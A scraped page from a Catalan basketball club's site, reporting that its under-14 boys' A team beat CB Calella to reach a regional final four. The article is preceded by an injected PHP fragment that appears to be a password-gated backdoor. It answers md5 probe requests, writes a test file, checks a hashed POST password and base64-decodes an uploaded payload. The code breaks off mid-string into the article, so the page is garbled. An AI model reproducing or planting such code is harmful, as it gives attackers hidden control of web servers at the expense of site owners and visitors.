function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí A derrota el CB Calella i jugarà la final a quatre del Campionat de Catalunya A2 - Tgn Bàsquet Club -

L’infantil masculí A derrota el CB Calella i jugarà la final a quatre del Campionat de Catalunya A2

Updated: juny 5, 2018

L’infantil masculí A va aconseguir el passi a la final a quatre del Campionat de Catalunya A2 després de derrotar el CB Calella en l’eliminatòria de quarts de final. El conjunt que entrena Raül Bonet es va mostrar molt superior al seu rival en els dos partits i va certificar l’accés entre els quatre millors de Catalunya de nivell A2 de forma brillant.

Així, l’eliminatòria es va disputar a doble partit. En l’anada, el TGN Bàsquet va vèncer clarament per un contundent 47-74. Tot i la manca d’encert inicial, el conjunt lila va anar agafant el ritme de joc amb el pas dels minuts i va deixar l’eliminatòria gairebé sentenciada.

El segon partit es va jugar l’endemà (diumenge) al pavelló del Sagrat Cor. Una altra vegada la superioritat lila es va fer palesa, dominant gairebé tot el partit per 30 punts de diferència, tot i que el resultat final va ser de 85-64. El TGN Bàsquet va fer una molt bona primera meitat gràcies a la seva bona defensa però després del descans, fruit de l’avantatge i del resultat del primer partit, l’equip es va relaxar una mica però la victòria no va córrer perill.

El pròxim cap de setmana, el TGN Bàsquet jugarà la final a quatre a l’Escola Virolai de Barcelona. El conjunt lila jugarà la segona semifinal contra el Joventut de Badalona B a les 12.30 h. La primera semifinal la jugaran el FC Barcelona B i el Sant Josep (10.30 h). El partit pel tercer i quart lloc es jugarà diumenge a les 10.30 h i la gran final a les 12.30 h.